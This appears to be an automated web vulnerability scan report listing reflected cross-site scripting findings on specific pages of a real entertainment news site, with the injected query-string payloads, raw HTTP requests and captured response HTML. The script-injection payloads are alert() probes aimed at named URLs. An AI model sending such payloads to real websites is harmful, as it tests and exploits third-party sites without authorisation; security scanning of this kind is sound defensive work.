href='http://www.etonline.com/tv/116499_Robert_Downey_Jr_Reveals_Baby_s_Gender/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html' class='black_text_link'><img src='/media/photo/2011/12/100467/holly_madison_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html' class='black_text_link horizontal_excerpt'>Celebs Hit Las Vegas [Pics]</a></h4><p>What happens in Vegas doesn't always stay there.&nbsp; Click to see what all the celebs were up to in Sin City.</p><a target='_self' href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html' class='black_text_link'><img src='/media/photo/2011/12/100455/robert_downey_jr_benny_benassi_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html' class='black_text_link horizontal_excerpt'>Celeb Doppelgangers [Pics]</a></h4><p>Here are the doppelgangers of the stars.&nbsp; Click the pics to see if you agree that these celebs resemble one another!&nbsp;</p><a target='_self' href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/gossip/39237_Before_They_Were_Famous/index.html' class='black_text_link'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' /></a><div class='content_text horizon..
- /music/

/music/

http://www.theinsider.com/music/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00023B)%3C/sc..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00023B)</script>

Request

GET /music/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/music/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:54:56 GMT
Content-Length: 11227
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Music News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="music" /> <meta name="date" content="2011-10-21 17:44:00" /><meta property="og:title" content="Music News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/music/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Music News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 17:44:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/music;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/music;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/music;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Music+Channel+page+http://insdr.co/oeNTrM+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/music/music.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/music/"><img src="/media/img/channel_page_name_v3_music.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/music/47066_Common_and_John_Legend_Will_Make_You_Believers/index.html' class='black_text_link'><img src='/media/photo/2011/12/100358/commoncover_john_legend_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/music/47066_Common_and_John_Legend_Will_Make_You_Believers/index.html' class='black_text_link horizontal_excerpt'>Common and John Legend Will Make You 'Believe'</a></h4><p>With the release of his latest studio album rapidly approaching, Common's been releasing single after single and doesn't disappoint with his latest song <em>The Believer</em>.</p><a target='_self' href='/music/47066_Common_and_John_Legend_Will_Make_You_Believers/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='black_text_link'><img src='/media/photo/2011/12/100354/vid_keltie_416_111205.jpg' height='380' width='640' class='channel_vid_img' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='black_text_link'>Cody Simpson Talks Girls & Dolls!</a></h4></div><div class='vid_excerpt'><p>Last week the internet combusted with the rumor that Cody Simpson was dating Kylie Jenner, after the two were spotted together at The Grove.</p><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/music/46987_Erin_Lucas_Playlist_December_6/index.html' class='black_text_link'><img src='/media/photo/2011/12/100132/erin_lucas_416.jpg' class='channel_vid_img' height='380' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music/46987_Erin_Lucas_Playlist_December_6/index.html' class='black_text_link'>6 Must Hear New Songs!</a></h4></div><div class='vid_excerpt'><p>Our music Insider Erin Lucas is back with another collection of fresh jams that you simply have to hear!</p><a target='_self' href='/music/46987_Erin_Lucas_Playlist_December_6/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/music/46983_Madonna_Super_Bowl_Halftime_Show_confirmed/index.html' class='black_text_link'><img src='/media/photo/madonna_fshamim_231011_130115350_416_rev.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/music/46983_Madonna_Super_Bowl_Halftime_Show_confirmed/index.html' class='black_text_link horizontal_excerpt'>Madonna Confirmed For Super Bowl Halftime Show!</a></h4><p>After more than a month of rumors, NBC aired a commercial during Sunday Night Football that officially confirmed Madonna would perform at the XLVI Super Bowl halftime show!</p><a target='_self' href='/music/46983_Madonna_Super_Bowl_Halftime_Show_confirmed/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/music/46957_Nicki_Minaj_drops_Rom..
- /fashion/index.html

/fashion/index.html

http://www.theinsider.com/fashion/index.html?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00029C)</script>

Request

GET /fashion/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/search/index.html?sort=date-sdate
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:55:03 GMT
Content-Length: 11024
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Celebrity Fashion | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="fashion" /> <meta name="date" content="2011-05-26 11:31:00" /><meta property="og:title" content="Celebrity Fashion | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/fashion/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Celebrity Fashion | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-26 11:31:00" /><Attribute name="sdate" value="20110526" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/fashion;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/fashion;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/fashion;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Fashion+Channel+Page+http://insdr.co/pcrbni+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/fashion/fashion.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/fashion/"><img src="/media/img/channel_page_name_v3_fashion.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='black_text_link'><img src='/media/photo/2011/12/100422/emily_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='black_text_link horizontal_excerpt'>Emily Blunt's YSL ad: YES!</a></h4><p>I find Emily Blunt's special brand of charm and charisma to be intoxicating, so it's rather fitting she's now fronting YSL's newest fragrance: Opium.</p><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html' class='black_text_link'><img src='/media/photo/2011/12/100330/sarah_jessica_parker_416_131207207_134862517.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html' class='black_text_link horizontal_excerpt'>What's Going on Sarah Jessica Parker?!</a></h4><p><em>Sex and the City</em> catapulted Sarah Jessica Parker into instant fashion icon status, and her real-life penchant for gorgeous, whimsical and other-worldly gowns cemented it. But her carefully crafted reputation has been put into serious question as of late with her dubious&nbsp; -- actually let's face it, straight up hideous -- red carpet outfits. Check out her recent sartorial disasters that has everyone asking, What's Going on With Sarah Jessica Parker?!?</p><a target='_self' href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='black_text_link'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='black_text_link horizontal_excerpt'>The Good, the Bad and the Ugly</a></h4><p>Between the Trevor Project event in L.A. and Billboard's Women of the Year event in NYC, plenty of A-list ladies stepped out in style this weekend. Check out all the great looks, the not so great looks, and the mind-boggling bad one you have to see to believe.</p><a target='_self' href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/fashion/46944_Lady_Gaga_s_X_Rated_Secret_to_Good_Skin/index.html' class='black_text_link'><img src='/media/photo/2011/12/99887/lady_gaga_416_awalker_133890986.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/46944_Lady_Gaga_s_X_Rated_Secret_to_Good_Skin/index.html' class='black_text_link horizontal_excerpt'>Lady Gaga's X Rated Secret to Good Skin</a></h4><p>Well nobody ever accused Lady Gaga of being shy!</p><a target='_self' href='/fashion/46944_Lady_Gaga_s_X_Rated_Secret_to_..
- /photos/

/photos/

http://www.theinsider.com/photos/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00031C)%3C/s..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00031C)</script>

Request

GET /photos/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/photos/index.html
